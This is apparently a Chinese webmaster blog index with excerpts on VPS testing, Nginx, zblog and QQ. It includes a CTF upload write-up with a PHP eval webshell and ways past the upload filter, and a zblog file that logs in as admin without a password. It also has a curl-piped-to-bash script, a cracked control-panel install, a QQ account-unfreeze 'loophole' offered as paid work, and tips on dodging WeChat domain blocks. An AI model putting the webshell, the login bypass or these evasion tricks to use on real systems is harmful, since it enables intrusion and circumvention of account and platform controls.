百度杯CTF比赛 九月场(Upload)
页面题目:页面写着可以你可以随意上传文件,那就上传一个普通的一句话木马<?php eval($_REQUEST['a']);发现上传成功,然后点击上传成功发现没有解析,猜测有可能是过滤了php这个字符串,换成短标签试一下<? eval($_REQUEST['a']); ?>发现也没有被解析怀疑还有可能过滤了<?符号,不过还可以用<script language="php"></script>
Linux VPS常用测试脚本,包含网速,延迟,路由等信息
平时购买VPS的时候,难免会碰到性能或网络较差的VPS,为避免买到这种小鸡,使用一键测试脚本是必不可少的。下面将总结一些VPS常见的测试脚本,方便朋友们使用。VPS综合测试SuperBench.sh食用wget -qO- git.io/superbench.sh | bash或者curl -LsO git.io/superbench.sh; chmod +x superbench.sh演示图Bench.sh
星外主控开心版及安装过程
前言:系统介绍就自行移步到官网看吧:http://7i24.com/今天找到一份这个系统主控的开心版,折腾了一下,顺便记录下安装的过程废话不多说,开始折腾吧!!文件只有主控!没有被控!文件只有主控!没有被控!文件只有主控!没有被控!安装过程:由于这个系统是用 ASP 来编写的,所以需要运行在 win 平台上所需环境 :windows + IIS + SQL Server博主开了一台腾讯云,使用宝塔面板来一键配置所需环境使用宝塔面板创建站点:注意:数据库名一定要为:FreeHost然后上传程序文件
宝塔面板安装VeryNginx免费WAF防火墙
最近小白都在找宝塔面板Nginx防火墙的替代软件。找了一圈发现有个叫VeryNginx的WAF防火墙。主要有一个功能吸引了我。就是能使用浏览器验证。可以避免被采集。也可以用来防御CC攻击,基本跟宝塔的收费插件nginx差不多功能,还带图形界面。VeryNginx有个浏览器验证功能,可以选择cookie或者JavaScript验证。小白测试了下cookie功能确实还不错,可以有效的抵御小学生攻击。还可以省19.8元/月,毕竟宝塔官方的Nginx防火墙按月收费,价格是19.8一个月。如果你嫌麻烦,或
Nginx使用CDN之后两行代码获取真实的用户IP
前言如果服务器使用了Nginx+CDN该如何获取访问用户的真实IP呢?默认情况下我们Nginx获取到总是CDN节点的IP代理,接下来介绍如何使用两行代码搞定无法获取真实IP难题!获取访问用户真实IP的方法首先找到Nginx的nginx.conf文件;宝塔Nginx的配置文件位置:/www/server/nginx/conf/nginx.conf一般Nginx的配置文件位置:/usr/local/nginx/conf/nginx.conf如果您使用的web服务是宝塔面板,则可以在“软件管理”》“运
Google Compute Engine 使用工具链接SSH
1、使用 Google Cloud SSH 连接2、 切换到 root 用户sudo -i3、 编辑ssh配置文件vi /etc/ssh/sshd_config修改以下值:PermitRootLogin yes PasswordAuthentication yes修改完按ESC键,再按 : 然后输入wq 回车即可4、重启sshsystemctl restart sshd
Linux系统如何管理创建、删除、修改用户角色权
Linux是一个多用户的操作系统,引入用户,可以更加方便管理Linux服务器,系统默认需要以一个用户的身份登入,而且在系统上启动进程也需要以一个用户身份去运行,用户可以限制某些进程对特定资源的权限控制。Linux系统如何管理创建、删除、修改用户角色、用户权限配置、组权限配置及特殊权限深入剖析。1 Linux用户及组Linux操作系统对多用户的管理,是非常繁琐的,所以用组的概念来管理用户就变得简单,每个用户可以在一个独立的组,每个组也可以有零个用户或者多个用户。Linux系统用户是根据用户ID来识
zfaka 增加易支付接口(支持支付宝/QQ/微信)
简介zfaka:免费、安全、稳定、高效的发卡系统Github: https://github.com/zlkbdotnet/zfaka操作上传接口文件下载文件github: https://github.com/anhao/zfaka-epay-sdk上传文件⑴ 把Pay下面的 三个文件夹 alpayalipay , alpaywxpay , alpayqqpay 上传到zfaka程序的application\lib
zblog忘记管理员密码、登录页面无法打开的临时解决方法
方法一此方法为了管理员用户忘记密码,或者登录页面无法打开的情况临时解决方法。新建一个php文件放你网站根目录,打开就可以自动登录管理员账号。<?php
require 'zb_system/function/c_system_base.php';
$uid = 1; //这里为管理员用户ID;
SetLoginCookie($zbp->GetMemberByID($uid),time()+86400);
header
2019外面接单解封永久冻结QQ的方法
722解封永久冻结QQ漏洞教程条件:1.微信绑定了冻结的QQ号2.微信钱包已经实名认证3.微信不能停封教程:教程:拨打电话95017,按提示按9,然后输入被冻结的QQ,按#号。然后输入微信的实名认证的身份证,按#号。输入微信支付密码,按#号。然后输入目前拨打电话的手机号,按#号。然后回收到短信,无需理会,按电话语音提示是否冻结微信号,按#号,然后提示是否冻结微信绑定的QQ号,按#号。然后会收到三条短信,接着挂断电话,去:aq.qq.com/007即可修改QQ密码。然后去:https://url.
使用百度云扫描和百度云观测知道扫描检测网站漏洞
没有绝对安全的系统,每个站长都应不定时关注一下自己的网站的安全问题,百度的百度云扫描和百度云观测提供了免费的检测扫描服务,能检测出一些易见的BUG漏洞百度云观测https://ce.baidu.com百度云扫描https://sao.baidu.com
域名被封杀,绿标短链接访问
域名被腾讯拦截,是跟淘宝一样-如需浏览,请长按网址复制后使用浏览器访问。域名被微信屏蔽,顾名思义,屏蔽,肯定是看不到!!域名被信封,确实很多因素有关,简单列举下:1、微信规定域名要备案,并且要加白名单,新买的域名没做站就被封,应该是抢的刚被人放弃的域名,并且有过黑历史,以前在微信QQ有过不良记录,被用户在腾讯渠道被举报过。2、QQ跟微信,是不同的监测机制,同时两边都推广很危险。极强不少客户,前期就吃过亏,域名被封的快。3、网站流量太大,微信里面有个传播2000次就不被用户看到的问题,比如分享赚类
